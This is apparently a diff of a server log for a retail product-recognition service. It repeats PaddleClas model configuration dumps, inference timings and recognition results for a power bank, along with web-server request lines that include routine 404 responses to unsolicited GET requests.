/root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 08:05:18 INFO: ir_optim : True +2022-01-29 08:05:18 INFO: labe_list : ['foreground'] +2022-01-29 08:05:18 INFO: max_det_results : 5 +2022-01-29 08:05:18 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 08:05:18 INFO: rec_nms_thresold : 0.05 +2022-01-29 08:05:18 INFO: threshold : 0.2 +2022-01-29 08:05:18 INFO: use_fp16 : False +2022-01-29 08:05:18 INFO: use_gpu : False +2022-01-29 08:05:18 INFO: use_tensorrt : False +2022-01-29 08:05:18 INFO: IndexProcess : +2022-01-29 08:05:18 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 08:05:18 INFO: return_k : 5 +2022-01-29 
08:05:18 INFO: score_thres : 0.5 +2022-01-29 08:05:18 INFO: RecPostProcess : None +2022-01-29 08:05:18 INFO: RecPreProcess : +2022-01-29 08:05:18 INFO: transform_ops : +2022-01-29 08:05:18 INFO: ResizeImage : +2022-01-29 08:05:18 INFO: size : 224 +2022-01-29 08:05:18 INFO: NormalizeImage : +2022-01-29 08:05:18 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 08:05:18 INFO: order : +2022-01-29 08:05:18 INFO: scale : 0.00392157 +2022-01-29 08:05:18 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 08:05:18 INFO: ToCHWImage : None +Inference: 378.3998489379883 ms per batch image +[{'bbox': [167, 76, 386, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7070856}] +{'bbox': [167, 76, 386, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7070856} +234 +["{'bbox': [167, 76, 386, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7070856}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 164/177] 49.79.98.245 () {34 vars in 446 bytes} [Sat Jan 29 08:05:17 2022] POST /reference_client/ => generated 126 bytes in 3643 msecs (HTTP/1.1 200) 5 headers in 158 bytes (26 switches on core 0) +[pid: 13128|app: 0|req: 10/178] 39.103.131.94 () {24 vars in 260 bytes} [Sat Jan 29 08:11:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 165/179] 39.103.131.94 () {34 vars in 637 bytes} [Sat Jan 29 08:11:24 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 166/180] 39.103.131.94 () {26 vars in 313 bytes} [Sat Jan 29 08:11:30 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 167/181] 83.97.20.34 () {30 vars in 329 bytes} [Sat Jan 29 08:48:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 168/182] 185.173.35.57 () {30 vars in 451 bytes} [Sat Jan 29 09:11:35 2022] GET / => 
generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 169/183] 128.14.133.58 () {34 vars in 487 bytes} [Sat Jan 29 09:23:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 170/184] 188.4.90.110 () {32 vars in 469 bytes} [Sat Jan 29 09:36:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 171/185] 104.248.45.211 () {34 vars in 524 bytes} [Sat Jan 29 10:35:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 172/186] 65.49.20.69 () {28 vars in 305 bytes} [Sat Jan 29 11:19:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 173/187] 83.97.20.34 () {26 vars in 287 bytes} [Sat Jan 29 11:44:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 174/188] 39.103.131.94 () {38 vars in 679 bytes} [Sat Jan 29 12:09:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 175/189] 143.198.23.33 () {32 vars in 439 bytes} [Sat Jan 29 12:54:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-29 13:38:44 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 13:38:44 INFO: DetPostProcess : +2022-01-29 13:38:44 INFO: DetPreProcess : +2022-01-29 13:38:44 INFO: transform_ops : +2022-01-29 13:38:44 INFO: DetResize : +2022-01-29 13:38:44 INFO: interp : 2 +2022-01-29 13:38:44 INFO: keep_ratio : False +2022-01-29 13:38:44 INFO: target_size : [640, 640] +2022-01-29 13:38:44 INFO: DetNormalizeImage : +2022-01-29 13:38:44 INFO: is_scale : True +2022-01-29 13:38:44 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 13:38:44 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 13:38:44 INFO: DetPermute : +2022-01-29 13:38:44 INFO: Global : +2022-01-29 13:38:44 INFO: batch_size : 1 +2022-01-29 13:38:44 INFO: cpu_num_threads : 1 +2022-01-29 13:38:44 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 13:38:44 INFO: enable_benchmark : True +2022-01-29 13:38:44 INFO: enable_mkldnn : True +2022-01-29 13:38:44 INFO: enable_profile : False +2022-01-29 13:38:44 INFO: gpu_mem : 8000 +2022-01-29 13:38:44 INFO: image_shape : [3, 640, 640] +2022-01-29 13:38:44 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 13:38:44 INFO: ir_optim : True +2022-01-29 13:38:44 INFO: labe_list : ['foreground'] +2022-01-29 13:38:44 INFO: max_det_results : 5 +2022-01-29 13:38:44 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 13:38:44 INFO: rec_nms_thresold : 0.05 +2022-01-29 13:38:44 INFO: threshold : 0.2 +2022-01-29 13:38:44 INFO: use_fp16 : False +2022-01-29 13:38:44 INFO: use_gpu : False +2022-01-29 13:38:44 INFO: use_tensorrt : False +2022-01-29 13:38:44 INFO: IndexProcess : +2022-01-29 13:38:44 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 13:38:44 INFO: return_k : 5 +2022-01-29 
13:38:44 INFO: score_thres : 0.5 +2022-01-29 13:38:44 INFO: RecPostProcess : None +2022-01-29 13:38:44 INFO: RecPreProcess : +2022-01-29 13:38:44 INFO: transform_ops : +2022-01-29 13:38:44 INFO: ResizeImage : +2022-01-29 13:38:44 INFO: size : 224 +2022-01-29 13:38:44 INFO: NormalizeImage : +2022-01-29 13:38:44 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 13:38:44 INFO: order : +2022-01-29 13:38:44 INFO: scale : 0.00392157 +2022-01-29 13:38:44 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 13:38:44 INFO: ToCHWImage : None +Inference: 378.65400314331055 ms per batch image +[{'bbox': [226, 71, 560, 468], 'rec_docs': '小度充电宝', 'rec_scores': 0.60283107}] +{'bbox': [226, 71, 560, 468], 'rec_docs': '小度充电宝', 'rec_scores': 0.60283107} +234 +["{'bbox': [226, 71, 560, 468], 'rec_docs': '小度充电宝', 'rec_scores': 0.60283107}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 176/190] 49.79.98.245 () {34 vars in 447 bytes} [Sat Jan 29 13:38:42 2022] POST /reference_client/ => generated 126 bytes in 3112 msecs (HTTP/1.1 200) 5 headers in 158 bytes (15 switches on core 0) +[pid: 13129|app: 0|req: 177/191] 162.142.125.10 () {28 vars in 311 bytes} [Sat Jan 29 13:55:45 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 178/192] 162.142.125.10 () {34 vars in 443 bytes} [Sat Jan 29 13:55:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-29 13:58:47 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 13:58:47 INFO: DetPostProcess : +2022-01-29 13:58:47 INFO: DetPreProcess : +2022-01-29 13:58:47 INFO: transform_ops : +2022-01-29 13:58:47 INFO: DetResize : +2022-01-29 13:58:47 INFO: interp : 2 +2022-01-29 13:58:47 INFO: keep_ratio : False +2022-01-29 13:58:47 INFO: target_size : [640, 640] +2022-01-29 13:58:47 INFO: DetNormalizeImage : +2022-01-29 13:58:47 INFO: is_scale : True +2022-01-29 13:58:47 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 13:58:47 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 13:58:47 INFO: DetPermute : +2022-01-29 13:58:47 INFO: Global : +2022-01-29 13:58:47 INFO: batch_size : 1 +2022-01-29 13:58:47 INFO: cpu_num_threads : 1 +2022-01-29 13:58:47 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 13:58:47 INFO: enable_benchmark : True +2022-01-29 13:58:47 INFO: enable_mkldnn : True +2022-01-29 13:58:47 INFO: enable_profile : False +2022-01-29 13:58:47 INFO: gpu_mem : 8000 +2022-01-29 13:58:47 INFO: image_shape : [3, 640, 640] +2022-01-29 13:58:47 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 13:58:47 INFO: ir_optim : True +2022-01-29 13:58:47 INFO: labe_list : ['foreground'] +2022-01-29 13:58:47 INFO: max_det_results : 5 +2022-01-29 13:58:47 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 13:58:47 INFO: rec_nms_thresold : 0.05 +2022-01-29 13:58:47 INFO: threshold : 0.2 +2022-01-29 13:58:47 INFO: use_fp16 : False +2022-01-29 13:58:47 INFO: use_gpu : False +2022-01-29 13:58:47 INFO: use_tensorrt : False +2022-01-29 13:58:47 INFO: IndexProcess : +2022-01-29 13:58:47 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 13:58:47 INFO: return_k : 5 +2022-01-29 
13:58:47 INFO: score_thres : 0.5 +2022-01-29 13:58:47 INFO: RecPostProcess : None +2022-01-29 13:58:47 INFO: RecPreProcess : +2022-01-29 13:58:47 INFO: transform_ops : +2022-01-29 13:58:47 INFO: ResizeImage : +2022-01-29 13:58:47 INFO: size : 224 +2022-01-29 13:58:47 INFO: NormalizeImage : +2022-01-29 13:58:47 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 13:58:47 INFO: order : +2022-01-29 13:58:47 INFO: scale : 0.00392157 +2022-01-29 13:58:47 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 13:58:47 INFO: ToCHWImage : None +Inference: 375.9171962738037 ms per batch image +[{'bbox': [204, 14, 443, 456], 'rec_docs': '小度充电宝', 'rec_scores': 0.5565247}] +{'bbox': [204, 14, 443, 456], 'rec_docs': '小度充电宝', 'rec_scores': 0.5565247} +234 +["{'bbox': [204, 14, 443, 456], 'rec_docs': '小度充电宝', 'rec_scores': 0.5565247}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 179/193] 49.79.98.245 () {34 vars in 447 bytes} [Sat Jan 29 13:58:46 2022] POST /reference_client/ => generated 126 bytes in 3463 msecs (HTTP/1.1 200) 5 headers in 158 bytes (22 switches on core 0) +req +2022-01-29 14:28:35 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 14:28:35 INFO: DetPostProcess : +2022-01-29 14:28:35 INFO: DetPreProcess : +2022-01-29 14:28:35 INFO: transform_ops : +2022-01-29 14:28:35 INFO: DetResize : +2022-01-29 14:28:35 INFO: interp : 2 +2022-01-29 14:28:35 INFO: keep_ratio : False +2022-01-29 14:28:35 INFO: target_size : [640, 640] +2022-01-29 14:28:35 INFO: DetNormalizeImage : +2022-01-29 14:28:35 INFO: is_scale : True +2022-01-29 14:28:35 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:28:35 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:28:35 INFO: DetPermute : +2022-01-29 14:28:35 INFO: Global : +2022-01-29 14:28:35 INFO: batch_size : 1 +2022-01-29 14:28:35 INFO: cpu_num_threads : 1 +2022-01-29 14:28:35 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 14:28:35 INFO: enable_benchmark : True +2022-01-29 14:28:35 INFO: enable_mkldnn : True +2022-01-29 14:28:35 INFO: enable_profile : False +2022-01-29 14:28:35 INFO: gpu_mem : 8000 +2022-01-29 14:28:35 INFO: image_shape : [3, 640, 640] +2022-01-29 14:28:35 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 14:28:35 INFO: ir_optim : True +2022-01-29 14:28:35 INFO: labe_list : ['foreground'] +2022-01-29 14:28:35 INFO: max_det_results : 5 +2022-01-29 14:28:35 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 14:28:35 INFO: rec_nms_thresold : 0.05 +2022-01-29 14:28:35 INFO: threshold : 0.2 +2022-01-29 14:28:35 INFO: use_fp16 : False +2022-01-29 14:28:35 INFO: use_gpu : False +2022-01-29 14:28:35 INFO: use_tensorrt : False +2022-01-29 14:28:35 INFO: IndexProcess : +2022-01-29 14:28:35 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 14:28:35 INFO: return_k : 5 +2022-01-29 
14:28:35 INFO: score_thres : 0.5 +2022-01-29 14:28:35 INFO: RecPostProcess : None +2022-01-29 14:28:35 INFO: RecPreProcess : +2022-01-29 14:28:35 INFO: transform_ops : +2022-01-29 14:28:35 INFO: ResizeImage : +2022-01-29 14:28:35 INFO: size : 224 +2022-01-29 14:28:35 INFO: NormalizeImage : +2022-01-29 14:28:35 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:28:35 INFO: order : +2022-01-29 14:28:35 INFO: scale : 0.00392157 +2022-01-29 14:28:35 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:28:35 INFO: ToCHWImage : None +Inference: 378.2503604888916 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 5/10] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 03:54:46 2021] POST /reference_client/ => generated 98 bytes in 6186 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) +[pid: 13129|app: 0|req: 180/194] 49.79.98.245 () {32 vars in 419 bytes} [Sat Jan 29 14:28:33 2022] POST /reference_client/ => generated 98 bytes in 3273 msecs (HTTP/1.1 200) 5 headers in 157 bytes (25 switches on core 0) req -2021-11-03 03:58:18 INFO: +2022-01-29 14:29:10 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -1796,77 +2066,191 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:58:18 INFO: DetPostProcess : -2021-11-03 03:58:18 INFO: DetPreProcess : -2021-11-03 03:58:18 INFO: transform_ops : -2021-11-03 03:58:18 INFO: DetResize : -2021-11-03 03:58:18 INFO: interp : 2 -2021-11-03 03:58:18 INFO: keep_ratio : False -2021-11-03 03:58:18 INFO: target_size : [640, 640] -2021-11-03 03:58:18 INFO: DetNormalizeImage : -2021-11-03 03:58:18 INFO: is_scale : True -2021-11-03 03:58:18 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:58:18 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:58:18 INFO: DetPermute : -2021-11-03 03:58:18 INFO: Global : -2021-11-03 03:58:18 INFO: batch_size : 1 -2021-11-03 03:58:18 INFO: cpu_num_threads : 10 -2021-11-03 03:58:18 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:58:18 INFO: enable_benchmark : True -2021-11-03 03:58:18 INFO: enable_mkldnn : True -2021-11-03 03:58:18 INFO: enable_profile : False -2021-11-03 03:58:18 INFO: gpu_mem : 8000 -2021-11-03 03:58:18 INFO: image_shape : [3, 640, 640] -2021-11-03 03:58:18 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:58:18 INFO: ir_optim : True -2021-11-03 03:58:18 INFO: labe_list : ['foreground'] -2021-11-03 03:58:18 INFO: max_det_results : 5 -2021-11-03 03:58:18 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:58:18 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:58:18 INFO: threshold : 0.2 -2021-11-03 03:58:18 INFO: use_fp16 : False -2021-11-03 03:58:18 INFO: use_gpu : False -2021-11-03 03:58:18 INFO: use_tensorrt : False -2021-11-03 03:58:18 INFO: IndexProcess : -2021-11-03 03:58:18 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:58:18 INFO: return_k : 5 -2021-11-03 03:58:18 INFO: score_thres : 0.5 -2021-11-03 03:58:18 INFO: RecPostProcess : None -2021-11-03 03:58:18 INFO: RecPreProcess : -2021-11-03 03:58:18 INFO: transform_ops : -2021-11-03 03:58:18 INFO: ResizeImage : -2021-11-03 03:58:18 INFO: size : 224 -2021-11-03 03:58:18 INFO: NormalizeImage : -2021-11-03 03:58:18 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:58:18 INFO: order : -2021-11-03 03:58:18 INFO: scale : 0.00392157 -2021-11-03 03:58:18 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:58:18 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2410.8452796936035 ms per batch image +2022-01-29 14:29:10 INFO: DetPostProcess : +2022-01-29 14:29:10 INFO: DetPreProcess : +2022-01-29 14:29:10 INFO: transform_ops : +2022-01-29 14:29:10 INFO: DetResize : +2022-01-29 14:29:10 INFO: interp : 2 +2022-01-29 14:29:10 INFO: keep_ratio : False +2022-01-29 14:29:10 INFO: target_size : [640, 640] +2022-01-29 14:29:10 INFO: DetNormalizeImage : +2022-01-29 14:29:10 INFO: is_scale : True +2022-01-29 14:29:10 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:29:10 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:29:10 INFO: DetPermute : +2022-01-29 14:29:10 INFO: Global : +2022-01-29 14:29:10 INFO: batch_size : 1 +2022-01-29 14:29:10 INFO: cpu_num_threads : 1 +2022-01-29 14:29:10 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 14:29:10 INFO: enable_benchmark : True +2022-01-29 14:29:10 INFO: enable_mkldnn : True +2022-01-29 14:29:10 INFO: enable_profile : False +2022-01-29 14:29:10 INFO: gpu_mem : 8000 +2022-01-29 14:29:10 INFO: image_shape : [3, 640, 640] +2022-01-29 14:29:10 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 14:29:10 INFO: ir_optim : True +2022-01-29 14:29:10 INFO: labe_list : ['foreground'] +2022-01-29 14:29:10 INFO: max_det_results : 5 +2022-01-29 14:29:10 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 14:29:10 INFO: rec_nms_thresold : 0.05 +2022-01-29 14:29:10 INFO: 
threshold : 0.2 +2022-01-29 14:29:10 INFO: use_fp16 : False +2022-01-29 14:29:10 INFO: use_gpu : False +2022-01-29 14:29:10 INFO: use_tensorrt : False +2022-01-29 14:29:10 INFO: IndexProcess : +2022-01-29 14:29:10 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 14:29:10 INFO: return_k : 5 +2022-01-29 14:29:10 INFO: score_thres : 0.5 +2022-01-29 14:29:10 INFO: RecPostProcess : None +2022-01-29 14:29:10 INFO: RecPreProcess : +2022-01-29 14:29:10 INFO: transform_ops : +2022-01-29 14:29:10 INFO: ResizeImage : +2022-01-29 14:29:10 INFO: size : 224 +2022-01-29 14:29:10 INFO: NormalizeImage : +2022-01-29 14:29:10 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:29:10 INFO: order : +2022-01-29 14:29:10 INFO: scale : 0.00392157 +2022-01-29 14:29:10 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:29:10 INFO: ToCHWImage : None +Inference: 373.10314178466797 ms per batch image +[{'bbox': [253, 0, 525, 480], 'rec_docs': '小度充电宝', 'rec_scores': 0.7348937}] +{'bbox': [253, 0, 525, 480], 'rec_docs': '小度充电宝', 'rec_scores': 0.7348937} +234 +["{'bbox': [253, 0, 525, 480], 'rec_docs': '小度充电宝', 'rec_scores': 0.7348937}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13128|app: 0|req: 11/195] 49.79.98.245 () {32 vars in 418 bytes} [Sat Jan 29 14:29:09 2022] POST /reference_client/ => generated 126 bytes in 3101 msecs (HTTP/1.1 200) 5 headers in 158 bytes (21 switches on core 0) +req +2022-01-29 14:56:08 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 14:56:08 INFO: DetPostProcess : +2022-01-29 14:56:08 INFO: DetPreProcess : +2022-01-29 14:56:08 INFO: transform_ops : +2022-01-29 14:56:08 INFO: DetResize : +2022-01-29 14:56:08 INFO: interp : 2 +2022-01-29 14:56:08 INFO: keep_ratio : False +2022-01-29 14:56:08 INFO: target_size : [640, 640] +2022-01-29 14:56:08 INFO: DetNormalizeImage : +2022-01-29 14:56:08 INFO: is_scale : True +2022-01-29 14:56:08 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:56:08 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:56:08 INFO: DetPermute : +2022-01-29 14:56:08 INFO: Global : +2022-01-29 14:56:08 INFO: batch_size : 1 +2022-01-29 14:56:08 INFO: cpu_num_threads : 1 +2022-01-29 14:56:08 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 14:56:08 INFO: enable_benchmark : True +2022-01-29 14:56:08 INFO: enable_mkldnn : True +2022-01-29 14:56:08 INFO: enable_profile : False +2022-01-29 14:56:08 INFO: gpu_mem : 8000 +2022-01-29 14:56:08 INFO: image_shape : [3, 640, 640] +2022-01-29 14:56:08 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 14:56:08 INFO: ir_optim : True +2022-01-29 14:56:08 INFO: labe_list : ['foreground'] +2022-01-29 14:56:08 INFO: max_det_results : 5 +2022-01-29 14:56:08 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 14:56:08 INFO: rec_nms_thresold : 0.05 +2022-01-29 14:56:08 INFO: threshold : 0.2 +2022-01-29 14:56:08 INFO: use_fp16 : False +2022-01-29 14:56:08 INFO: use_gpu : False +2022-01-29 14:56:08 INFO: use_tensorrt : False +2022-01-29 14:56:08 INFO: IndexProcess : +2022-01-29 14:56:08 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 14:56:08 INFO: return_k : 5 +2022-01-29 
14:56:08 INFO: score_thres : 0.5 +2022-01-29 14:56:08 INFO: RecPostProcess : None +2022-01-29 14:56:08 INFO: RecPreProcess : +2022-01-29 14:56:08 INFO: transform_ops : +2022-01-29 14:56:08 INFO: ResizeImage : +2022-01-29 14:56:08 INFO: size : 224 +2022-01-29 14:56:08 INFO: NormalizeImage : +2022-01-29 14:56:08 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 14:56:08 INFO: order : +2022-01-29 14:56:08 INFO: scale : 0.00392157 +2022-01-29 14:56:08 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 14:56:08 INFO: ToCHWImage : None +Inference: 373.73828887939453 ms per batch image +[{'bbox': [202, 59, 445, 475], 'rec_docs': '小度充电宝', 'rec_scores': 0.6655937}] +{'bbox': [202, 59, 445, 475], 'rec_docs': '小度充电宝', 'rec_scores': 0.6655937} +234 +["{'bbox': [202, 59, 445, 475], 'rec_docs': '小度充电宝', 'rec_scores': 0.6655937}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 181/196] 49.79.98.245 () {34 vars in 447 bytes} [Sat Jan 29 14:56:06 2022] POST /reference_client/ => generated 126 bytes in 3567 msecs (HTTP/1.1 200) 5 headers in 158 bytes (22 switches on core 0) +[pid: 13129|app: 0|req: 182/197] 83.97.20.34 () {30 vars in 329 bytes} [Sat Jan 29 16:09:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-29 16:11:03 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 16:11:03 INFO: DetPostProcess : +2022-01-29 16:11:03 INFO: DetPreProcess : +2022-01-29 16:11:03 INFO: transform_ops : +2022-01-29 16:11:03 INFO: DetResize : +2022-01-29 16:11:03 INFO: interp : 2 +2022-01-29 16:11:03 INFO: keep_ratio : False +2022-01-29 16:11:03 INFO: target_size : [640, 640] +2022-01-29 16:11:03 INFO: DetNormalizeImage : +2022-01-29 16:11:03 INFO: is_scale : True +2022-01-29 16:11:03 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 16:11:03 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 16:11:03 INFO: DetPermute : +2022-01-29 16:11:03 INFO: Global : +2022-01-29 16:11:03 INFO: batch_size : 1 +2022-01-29 16:11:03 INFO: cpu_num_threads : 1 +2022-01-29 16:11:03 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 16:11:03 INFO: enable_benchmark : True +2022-01-29 16:11:03 INFO: enable_mkldnn : True +2022-01-29 16:11:03 INFO: enable_profile : False +2022-01-29 16:11:03 INFO: gpu_mem : 8000 +2022-01-29 16:11:03 INFO: image_shape : [3, 640, 640] +2022-01-29 16:11:03 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 16:11:03 INFO: ir_optim : True +2022-01-29 16:11:03 INFO: labe_list : ['foreground'] +2022-01-29 16:11:03 INFO: max_det_results : 5 +2022-01-29 16:11:03 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 16:11:03 INFO: rec_nms_thresold : 0.05 +2022-01-29 16:11:03 INFO: threshold : 0.2 +2022-01-29 16:11:03 INFO: use_fp16 : False +2022-01-29 16:11:03 INFO: use_gpu : False +2022-01-29 16:11:03 INFO: use_tensorrt : False +2022-01-29 16:11:03 INFO: IndexProcess : +2022-01-29 16:11:03 INFO: index_dir : 